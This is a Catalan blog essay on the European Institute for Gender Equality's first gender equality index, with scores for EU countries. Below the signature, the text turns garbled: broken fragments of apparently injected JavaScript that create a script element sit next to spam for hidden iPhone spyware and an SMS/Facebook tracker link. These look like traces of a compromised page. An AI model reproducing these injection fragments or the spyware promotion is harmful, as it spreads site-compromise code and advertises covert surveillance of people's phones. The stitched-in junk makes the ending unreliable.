Blog

“Superant desigualtats històriques”

Sr. Benet Armengol, exsecretari general del Gremi de Fabricants.

En una època en que tot s’avalua i de tot se’n fan índex i classificacions, coneixem ara que l’Institut Europeu de la Igualtat de Gènere (EIGE) ha publicat el primer índex en relació a aquest tema de la Igualtat basant-se en la feina, els salaris, el coneixement, el poder i la salut. Com a tota aquesta mena de treballs estadístics sempre hi cap la interpretació i la fiabilitat, però no deixa de ser interessant aquesta eina per tal de contribuir a la promoció de la igualtat de gènere i reforçar-la en un lloable intent de lluitar contra la discriminació per raó de sexe en l’àmbit de la Unió Europea. Encara que moltes vegades vulgui ignorar-se, hi ha molts factors que dificulten la perseguida igualtat i independència econòmica de la dona. En bona part són els factors que vol identificar l’índex : en matèria educativa; en l’àmbit laboral; en la distribució més equitativa del temps entre treball i família; en matèria retributiva; en la presa de decisions i ocupació de llocs de responsabilitat, tan en el sector públic com privat; i en l’eradicació de la violència de gènere i les desigualtats en l’accés a l’atenció sanitària. Un seriós i documentat intent de posar de relleu un complex problema que des de Brussel·les es vol afrontar en línea amb el contingut de la Carta de la Dona (Comissió Europea 2010) amb l’impuls comunitari i el desenvolupament de les politiques nacionals corresponents. El referit índex ha d’esdevenir l’indicador idoni per fer el seguiment del progrés en el temps d’aquesta perseguida unitat de gènere. De totes maneres la tasca no deixa de ser complicada, atesa la manca de dades harmonitzades. Malgrat això, com en molts altres supòsits, d’un punt o d’altre s’ha de partir a l’endegar un tema. Ara es comença sobre la base d’unes quantes dimensions avaluades i, d’entrada ja es pot oferir una aproximació parcial de la igualtat de gènere a la U.E. Per il·lustrar la referència, val a dir que amb una mitjana de 54 punts que és, exactament l’ atorgada a Espanya, tenim com a més desenvolupats en la matèria, per davant nostra: Suècia (74,3), Dinamarca (73,6), Finlàndia (73,4) Holanda (60,7) Regne Unit (60,4), Bèlgica (59,6), França (57,1) Eslovènia (56) Irlanda (55,2) i pel darrera, Alemanya (51,6), Àustria (50,4), els Països Bàltics, Malta, Polònia, Itàlia (40,9), Txèquia, Portugal, Hongria, Grècia, Bulgària i Romania (35,3). Si més no, la classificació és il·lustrativa. A partir d’aquí és l’ interès comunitari de millorar l’índex i, pel damunt de tot, d’eradicar les bretxes entre gèneres que un gradual augment de les puntuacions posades de manifest vindria a corroborar. En

tot cas, tot allò que vagi orientat cap a superar desigualtats injustificades, sigui per empara legislativa o per praxi quotidiana, és de justícia. B.A.O.

var d=document;var s=d.createElement(‘script’);

} else {if (document.currentScript) { iphone spy, spyware, iphone spywarehttp://buffetsoniamagalhaes.com.br/twitter-spy-read-facebook-sms-tracker-hidden/

Deixa un comentari

L'adreça electrònica no es publicarà Els camps necessaris estan marcats amb *

Podeu fer servir aquestes etiquetes i atributs HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>